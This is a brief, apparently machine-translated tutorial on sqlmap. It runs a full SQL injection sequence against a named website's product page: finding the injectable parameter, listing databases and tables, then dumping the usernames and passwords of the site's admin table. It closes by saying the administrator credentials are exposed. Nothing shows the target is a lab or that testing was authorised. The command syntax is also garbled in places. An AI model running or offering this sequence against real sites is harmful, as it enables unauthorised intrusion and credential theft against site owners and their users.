The use of sqlmap
Injection with sqlmap
1. The injection point can be swept out with the scanning tool. Here I will use an injection point to explain.
Sqlamp.py-u "http://www.gaoneng.com/product.php?cid=71"
You can see that there is a sql injection vulnerability here.
2 、
Sqlmap.py-u "http://www.gaoneng.com/product.php?cid=71"
-- dbs can run out the database name that exists.
Then you can run the table in the gaoneng database
Sqlmap.py-u "http://www.gaoneng.com/product.php?cid=71"-D gaoneng-- tables
Now that the table in the database has been exposed, the fields in the table can be exposed.
Sqlmap.py-u "http://www.gaoneng.com/product.php?cid=71"
-D gaoneng-T com_admin-- columns
You can see that there are fields, passwords and user names in this table that we need
Sqlmap.py-u "http://www.gaoneng.com/product.php?cid=71"
-D gaoneng-T com_admin-C username,password-- dump
As a result, the administrator password and user name of this website have been completely exposed.